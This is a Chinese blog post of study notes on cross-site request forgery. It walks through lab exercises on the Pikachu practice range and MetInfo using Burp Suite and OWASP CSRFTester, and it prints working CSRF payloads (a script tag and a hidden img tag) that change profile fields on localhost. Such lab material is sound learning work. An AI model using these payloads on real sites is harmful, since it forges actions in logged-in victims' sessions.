网络安全之CSRF&SSRF漏洞(上篇)(技术进阶)

已于 2024-05-10 13:53:19 修改
阅读量540 收藏 6
点赞数 15
文章标签: web安全 csrf 安全
于 2024-04-17 13:23:37 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_70911257/article/details/137818019
版权

目录

一,CSRF篇

二,认识什么是CSRF

三,实现CSRF攻击的前提

四,实战演练

【1】案例1

【2】案例2

【3】案例3

【4】案例4(metinfo)

一,CSRF篇

二,认识什么是CSRF

CSRF(Cross-site request forgery)简称:跨站请求伪造,存在巨大的危害性。是攻击者制造一个请求(一般是一个链接)诱导用户去点击,从而通过用户去访问正常的网站用攻击者伪造的请求去对网站发送一个请求。

三,实现CSRF攻击的前提

1,有这个漏洞(自己弄个号来攻击自己,成功了就说明有这个漏洞)

2,用户已经登录了

3,要知道协议包的结构(不然怎么伪造请求呢)

4,浏览器支持(如没有同源策略)

5,用户点击并打开恶意网站

四,实战演练

皮卡丘靶场为例:

环境:受害者为主机,虚拟机搭建恶意网站

在虚拟机中新建一个test.html,恶意网站代码为:

<script src='http://localhost/pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=gg&phonenum=1111&add=
11111&email=111111&submit=submit'>
</script>

【1】案例1

2,提交后他打开了小黑子的恶意网站

【2】案例2

1,使用bp抓包生成CSRF攻击代码

2,将生成的代码复制到虚拟机的恶意网站中

3,去访问恶意网站后

 

【3】案例3

使用OWASP-CSRFT工具

1,设置浏览器代理

2,开启工具进行抓包

      

3,用户点击提交后得到数据包:

4,生成一个攻击用的html文档

文档内容:

<html>

<head>
<title>OWASP CRSFTester Demonstration</title>
</head>

<body>

<H2>OWASP CRSFTester Demonstration</H2>

<img src="http://localhost:80/pkq/vul/csrf/csrfget/csrf_get_edit.php?sex=nang&phonenum=66666666&add=6666666&email=666666&submit=submit&" width="0" height="0" border="0"/>

</body>
</html>

5,将生成的html文件放到恶意网站中

用户去访问恶意网站

【4】案例4(metinfo)

1,登录后台

2,新增管理员用户

3,开启抓包

4,将抓取到的包含要用的数据的包生成html文件 

5,把文件放入恶意网站中,用户去访问

 

 

以上就是我的学习笔记了,谢谢观看!!!

佛渡有“缘”人
关注
  • 15
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
CSRF漏洞原理攻击与防御(非常细)
xnxqwzy的博客
10-20 1519
CSRF (Cross-site request forgery,跨站请求伪造)也被称为One Click Attack或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS),但它与XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过伪装成受信任用户请求受信任的网站。简单的说,是攻击者通过一些技术手段欺骗用户的浏览器去访问一个自己以前认证过的站点并运行一些操作(如发邮件,发消息,甚至财产操作(如转账和购买商品))。
[理论-学习]Web安全-CSRF-基础03
3hex的博客
09-11 560
声明: 由于笔者能力有限,难免出现各种错误和漏洞。全文仅作为个人笔记,仅供参考。 笔记内容来源于各类网课 环境:ESPCMSV5(本地环境),CSRFTester 一、概述 使用CSRFTester工具触发CSRF。 二、CSRF利用 首先打开CSRFTester,它会监听本地8008端口。我们配置浏览器代理为本地8008端口。 我们登陆系统后台,进入会员管理页面。 我们添加用户。 添加用户名,登录密码,确认密码,邮箱。 添加前打开CSRFTester的Start..
CSRF02】跨站请求伪造——DVWA靶场实操(含CSRF+XSS协同攻击实验)
Fighting_hawk的博客
03-15 7127
1. 掌握网页相关语言中各种标签的运用; 2. 灵活使用XSS注入代码; 3. 掌握CSRF攻击的方法; 4. 掌握XSS+CSRF协同攻击的方法。
CSRF:跨站请求伪造攻击
qq_68163788的博客
02-05 1567
CSRF(Cross-Site Request Forgery)是一种网络安全攻击,攻击者利用用户已经登录的身份,在用户不知情的情况下发送恶意请求,以执行某些操作或获取用户的敏感信息。攻击者通常会诱使用户访问包含恶意请求的页面,或者通过其他方式注入恶意代码,以触发CSRF攻击。 CSRF攻击通常利用用户在其他网站上的身份验证信息,因此攻击者可以利用这些信息来执行恶意操作,比如更改用户密码、转账、发送消息等。由于CSRF攻击利用了用户的信任和已登录的身份,因此很难被用户察觉。
如何在Spring项目防止CSRF攻击
Gilbert的博客
05-07 6740
什么是CSRF攻击? CSRF就是跨站请求伪造攻击,怎么理解呢? 首先我们来理解cookie机制,就是当你登录某个网站,从后端接收的cookie会存到浏览器中,你下次访问该网站时浏览器会将属该网站的cookies带过去。 那么如果黑客编写了一个页面,将你登录过的网站接口链接放入该页面,那你点击访问黑客写的页面就会访问你登录过的那个网站,这时候浏览器会认为是你在访问该网站就将cookie带过去...
CSRF的防御问题
sinat_35417322的博客
07-08 274
目录 背景 什么是CSRF? CSRF的防御 总结 背景 等保测评时,发现系统漏洞csrf,当收到漏洞报告时,一脸蒙。 什么是CSRF? CSRF:Cross Site Request Forgery,跨站点请求伪造。这是一种很长见的WEB攻击,同时也是WEB安全中最容易被忽视的一种攻击方式。 为了更好的理解举个例子: 在同一浏览器下,不同tag下发起请求,首先登陆系统...
XSS、CSRFSSRF漏洞原理以及防御方式_xss csrf ssrf
weixin_57514792的博客
07-27 760
XSS、CSRFSSRF漏洞原理以及防御方式_xss csrf ssrf
第29天:WEB漏洞-CSRFSSRF漏洞案例讲解1
08-03
1、当用户发送重要的请求时需要输入原始密码 3、检验 referer 来源,请求时判断请求链接是否为当前管理员正在使用的页面(管理员在编辑文章, 4、设置验证码
29 WEB漏洞-CSRFSSRF漏洞案例讲解-附件资源
03-02
29 WEB漏洞-CSRFSSRF漏洞案例讲解-附件资源
基础漏洞csrf挖掘实战
10-07
跨站请求伪造(CSRF)是一种网络攻击方式,它利用了用户浏览器的已登录状态,使攻击者能够以受害者的身份执行非授权的操作。攻击者通常借助受害者在其他网站上的合法会话,通过诱导受害者点击恶意链接或者加载含有...
CSRFTester:一款CSRF漏洞安全测试工具
02-26
CSRFTester:一款CSRF漏洞安全测试工具CSRFTester是一款CSRF漏洞的测试工具,讲工具之前,先大概介绍一下CSRF漏洞CSRF英文全称是CrossSiteRequestForgery,常被叫做跨站点伪造请求,是伪造客户端请求的一种攻击...
网络安全(黑客)——自学2024
最新发布
2401_84466325的博客
08-25 625
网络安全是一种综合性的概念,涵盖了保护计算机系统、网络基础设施和数据免受未经授权的访问、攻击、损害或盗窃的一系列措施和技术。经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
网络安全售前入门02——产品了解
风儿轻轻吹
08-24 550
WEB应用防火墙也叫简称WAF。对Web应用系统进行防护,通过WAF的安全防护能力,保障Web应用系统的正常、稳定运行。有硬件版与软件版,也有云WAF(通过域名解释重定向到安全厂商云上进行流量清洗再打回给企业业务系统上)。下面以硬件版WAF作为例子展开介绍。
入门网络安全工程师要学习哪些内容
白帽子佳奇的博客
08-18 1638
大家都知道网络安全行业很火,这个行业因为国家政策趋势正在大力发展,大有可为!但很多人对还是不了解,不知道需要学什么?知了堂小编总结出以下要点。是一个概称,学习的东西很多,具体学什么看自己以后的职业定位。如果你以后想成为安全产品工程师,学的内容侧重点就和不一样,如果你想成为安全开发工程师,学的侧重点就和安全不一样。学的东西很泛,但选定方向就简单了。大致的学习流程总结就是:网络基础、操作系统、中间件、数据库。其中电脑基础:像系统Windows基础和Linux基础、HTML基础、代码JS基础等。
网络安全入门教程(非常详细)从零基础入门到精通_网路安全 教程
2401_85023708的博客
08-21 1394
1.入行网络安全这是一条坚持的道路,三分钟的热情可以放弃往下看了。2.多练多想,不要离开了教程什么都不会了,最好看完教程自己独立完成技术方面的开发。3.有时多百度,我们往往都遇不到好心的大神,谁会无聊天天给你做解答。4.遇到实在搞不懂的,可以先放放,以后再来解决。先科普划分一下级别(全部按小白基础,会写个表格word就行的这种)**1级:脚本小子;难度:无,**达到“黑客新闻”的部分水准(一分钱买iphone、黑掉母校官网挂女神照片什么的)网络安全工程师;
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
08-23 1455
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
网络安全售前入门03——审计类产品了解
风儿轻轻吹
08-25 556
为方便初接触网络安全售前工作的小伙伴了解网安行业情况,我制作一系统售前入门(安全产品,安全服务,法律法规等)文章介绍,希望能给初进网安职场的小伙伴提供一点帮助。仅适合入门小白。
WEB漏洞深度解析:CSRFSSRF案例及防护策略
在第29天的WEB漏洞讲解中,主要关注了两种常见的安全问题:CSRF...理解并防范CSRFSSRF漏洞对于维护Web应用安全至关重要,开发者应熟知相关的检测技术,采取适当的防护策略,以保护用户数据和系统免受恶意攻击。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

佛渡有“缘”人

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值